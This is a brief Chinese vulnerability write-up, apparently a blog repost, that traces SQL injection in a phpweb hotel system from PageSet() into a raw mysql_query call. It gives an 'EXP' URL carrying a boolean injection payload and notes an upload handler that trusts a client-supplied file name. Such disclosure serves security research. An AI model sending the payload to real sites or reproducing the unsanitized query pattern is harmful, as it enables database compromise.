phpweb下的一套酒店系统。
   news/html/index.php
 
 
hotelphpweb SQL injection
//定义模块名和页面名
PageSet("news","detail");
 
跟踪PageSet函数。
 
 
hotelphpweb SQL injection
function pageset( $coltype, $pagename )
{
                global $GLOBALS['msql'];
                $msql->query( "select * from {P}_base_pageset where  coltype='{$coltype}' and pagename='{$pagename}'" );
//....省略代码N行
 
 
变量$coltype,$pagename未经过任何过滤直接代入query()方法
跟踪query() www.2cto.com
 
 
hotelphpweb SQL injection
                function query( $Query_String )
                {
                                $Query_String = str_replace( "{P}", $this->TablePre, $Query_String );
                                $this->connect( );
                                $this->Query_ID = mysql_query( $Query_String, $this->Link_ID );
                                $this->Row = 0;
                                $this->Errno = mysql_errno( );
                                $this->Error = mysql_error( );
                                if ( !$this->Query_ID )
                                {
                                                $this->halt( "Invalid SQL: ".$Query_String );
                                }
                                return $this->Query_ID;
                }
 
 
 
 
变量$Query_String直接代入查询
 
EXP:http://www.2cto.com /news/html/?384'/**/and/**/1=1/**/and/**/''='.html
 
本套程序的上传程序。保存的到服务端的文件名是用$_POST['fileName']获取的。这里也是可控。
 
 
来自情'Blog！